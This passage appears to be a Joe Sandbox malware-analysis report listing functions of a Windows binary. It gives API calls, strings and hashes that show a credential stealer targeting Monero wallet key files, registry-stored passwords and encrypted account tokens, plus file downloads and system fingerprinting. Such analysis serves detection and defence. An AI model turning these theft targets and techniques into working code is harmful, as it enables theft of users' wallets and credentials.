                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                  • API String ID: 3478931302-218353709
                  • Opcode ID: a4a62bdc993b18da633766df81a0980033c1083a6940a7580858ac190e390ea3
                  • Instruction ID: 2610062a2ac6dc627db40fb79ff3f7f41b17186a7fd618e3d4c91a5fd47fdd32
                  • Opcode Fuzzy Hash: a4a62bdc993b18da633766df81a0980033c1083a6940a7580858ac190e390ea3
                  • Instruction Fuzzy Hash: E25144B195011857DB19FB64DD96BED733CFB50700F4041A9B60AE20D2EE346B86CBA7
                  Function 008775D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 008772D0: memset.MSVCRT ref: 00877314
                    • Part of subcall function 008772D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0087733A
                    • Part of subcall function 008772D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008773B1
                    • Part of subcall function 008772D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0087740D
                    • Part of subcall function 008772D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00877452
                    • Part of subcall function 008772D0: HeapFree.KERNEL32(00000000), ref: 00877459
                  • lstrcat.KERNEL32(00000000,008917FC), ref: 00877606
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00877648
                  • lstrcat.KERNEL32(00000000, : ), ref: 0087765A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 0087768F
                  • lstrcat.KERNEL32(00000000,00891804), ref: 008776A0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 008776D3
                  • lstrcat.KERNEL32(00000000,00891808), ref: 008776ED
                  • task.LIBCPMTD ref: 008776FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                  • String ID: :
                  • API String ID: 3191641157-3653984579
                  • Opcode ID: 8cfeaffb784648441a2e8d3729aee433f90c5a327cf17e2294d1047e6fdde894
                  • Instruction ID: 4003e79a26a7e34e4f9cf70db9960584adbb258eafabeca879cc480b25c10265
                  • Opcode Fuzzy Hash: 8cfeaffb784648441a2e8d3729aee433f90c5a327cf17e2294d1047e6fdde894
                  • Instruction Fuzzy Hash: 42312171904109EBCB04EBF8DC99DFE7774FB64301B148118E116E72A6DA34E947DB62
                  Function 008772D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00877314
                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0087733A
                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008773B1
                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0087740D
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00877452
                  • HeapFree.KERNEL32(00000000), ref: 00877459
                  • task.LIBCPMTD ref: 00877555
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$EnumFreeOpenProcessValuememsettask
                  • String ID: Password
                  • API String ID: 2808661185-3434357891
                  • Opcode ID: f5eda99e5df88005bebf4351a6454ea2136028867a56ded9ea49171bf435ac9e
                  • Instruction ID: f8c9f962841549527e528082e8789f3b9357f0af8893482f4768f86608679cc5
                  • Opcode Fuzzy Hash: f5eda99e5df88005bebf4351a6454ea2136028867a56ded9ea49171bf435ac9e
                  • Instruction Fuzzy Hash: 68611AB59041689BDB24DB54CC85BDAB7B8FF44304F00C1E9E68DA6145EBB09BC9CFA1
                  Function 008760A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                    • Part of subcall function 008747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00874839
                    • Part of subcall function 008747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00874849
                  • InternetOpenA.WININET(00890DF7,00000001,00000000,00000000,00000000), ref: 0087610F
                  • StrCmpCA.SHLWAPI(?,015DE4A0), ref: 00876147
                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0087618F
                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 008761B3
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 008761DC
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0087620A
                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00876249
                  • InternetCloseHandle.WININET(?), ref: 00876253
                  • InternetCloseHandle.WININET(00000000), ref: 00876260
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                  • String ID:
                  • API String ID: 2507841554-0
                  • Opcode ID: 4a27f3c9b6baf86efca0fd2060ae5fc45780251877d6d3ccfce8f743ffa7365e
                  • Instruction ID: 0e4891e6db0ecc7c90b93b5f46b7740016c84ef89cb714310d3ecf08b5118bf1
                  • Opcode Fuzzy Hash: 4a27f3c9b6baf86efca0fd2060ae5fc45780251877d6d3ccfce8f743ffa7365e
                  • Instruction Fuzzy Hash: 46518471900218ABDB24DF90DC49BEE7778FB04705F108198B609E71D5EB74AA89CF66
                  Function 0087BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                  • lstrlen.KERNEL32(00000000), ref: 0087BC9F
                    • Part of subcall function 00888E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00888E52
                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0087BCCD
                  • lstrlen.KERNEL32(00000000), ref: 0087BDA5
                  • lstrlen.KERNEL32(00000000), ref: 0087BDB9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                  • API String ID: 3073930149-1079375795
                  • Opcode ID: b0147d4411b59534dc39f5241277931e3204093ceffe6086033456f541366e3c
                  • Instruction ID: b164c78a9623224f28466f6ba4cfb86f3ced93782de0115ddf55d089760a630e
                  • Opcode Fuzzy Hash: b0147d4411b59534dc39f5241277931e3204093ceffe6086033456f541366e3c
                  • Instruction Fuzzy Hash: 65B10D719101189AEB08FBA8CD96EEE7739FF54300F404169F516E21D2EF386A49CB63
                  Function 00886770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess$DefaultLangUser
                  • String ID: *
                  • API String ID: 1494266314-163128923
                  • Opcode ID: 6ef009b618e4dc2276d47103e5047166f93c4b8803c18622eaab8df07a1582e7
                  • Instruction ID: 13cce14c622e3fe2a320bd970416868f695c2265c80d78516b35b0f84a25d382
                  • Opcode Fuzzy Hash: 6ef009b618e4dc2276d47103e5047166f93c4b8803c18622eaab8df07a1582e7
                  • Instruction Fuzzy Hash: 31F03031908249EFD344EFE0A90972C7B70FB14702F040298E609C62A1EA724A929B96
                  Function 00874FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00874FCA
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00874FD1
                  • InternetOpenA.WININET(00890DDF,00000000,00000000,00000000,00000000), ref: 00874FEA
                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00875011
                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00875041
                  • InternetCloseHandle.WININET(?), ref: 008750B9
                  • InternetCloseHandle.WININET(?), ref: 008750C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                  • String ID:
                  • API String ID: 3066467675-0
                  • Opcode ID: bbcb6233397d03f7d4155c64651748deeb24f4407a7f8f160aa317c777e4c053
                  • Instruction ID: 4b520247f3e5e4e32ac5351d1dcaebd6ec6e2239dc15eb3dee42d7da063272e5
                  • Opcode Fuzzy Hash: bbcb6233397d03f7d4155c64651748deeb24f4407a7f8f160aa317c777e4c053
                  • Instruction Fuzzy Hash: B73108B4A0021CABDB20CF94DC85BDCB7B4FB48704F1081D9E609A7291DBB06AC58F99
                  Function 00888100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,015DD9F8,00000000,?,00890E2C,00000000,?,00000000), ref: 00888130
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00888137
                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00888158
                  • wsprintfA.USER32 ref: 008881AC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                  • String ID: %d MB$@
                  • API String ID: 2922868504-3474575989
                  • Opcode ID: dd315d7d7042d2fae915ac98aec7447e691016b245ea001a3f5a675007893c34
                  • Instruction ID: 095c46b20e3dc8931d5672bee55a0b9eb4371950234fda53481b693af03cbd81
                  • Opcode Fuzzy Hash: dd315d7d7042d2fae915ac98aec7447e691016b245ea001a3f5a675007893c34
                  • Instruction Fuzzy Hash: 79210BB1E44218ABDB14EFD4CC49FAEB7B8FB44B14F104609F615BB280DB7859018BA5
                  Function 008883DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                  Download Yara Rule
                  APIs
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00888426
                  • wsprintfA.USER32 ref: 00888459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0088847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 0088848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00888499
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                  • RegQueryValueExA.ADVAPI32(00000000,015DD968,00000000,000F003F,?,00000400), ref: 008884EC
                  • lstrlen.KERNEL32(?), ref: 00888501
                  • RegQueryValueExA.ADVAPI32(00000000,015DD818,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00890B34), ref: 00888599
                  • RegCloseKey.ADVAPI32(00000000), ref: 00888608
                  • RegCloseKey.ADVAPI32(00000000), ref: 0088861A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                  • String ID: %s\%s
                  • API String ID: 3896182533-4073750446
                  • Opcode ID: d465eb58e72e421c7f6cd948931420d9edf3621ec74bddff67f22c5bed132bee
                  • Instruction ID: f724480fcc1716138c27b4034c315ce5f89ad5bd897309968dc3cf014172ae6f
                  • Opcode Fuzzy Hash: d465eb58e72e421c7f6cd948931420d9edf3621ec74bddff67f22c5bed132bee
                  • Instruction Fuzzy Hash: AD213B7190021CABDB24DB94DC85FE9B3B8FB58700F40C2D8E609A6181DF716A82CFD4
                  Function 00887690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008876A4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 008876AB
                  • RegOpenKeyExA.ADVAPI32(80000002,015CB7A8,00000000,00020119,00000000), ref: 008876DD
                  • RegQueryValueExA.ADVAPI32(00000000,015DDAE8,00000000,00000000,?,000000FF), ref: 008876FE
                  • RegCloseKey.ADVAPI32(00000000), ref: 00887708
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: Windows 11
                  • API String ID: 3225020163-2517555085
                  • Opcode ID: 066a17d722f05ad050400740137376981fea9aff29e46be03037c6f9375cafd0
                  • Instruction ID: cdc97e17afdce6510e68df9e5c9ae8a9e4fa426dfdbe9b76ef06e93a8106e032
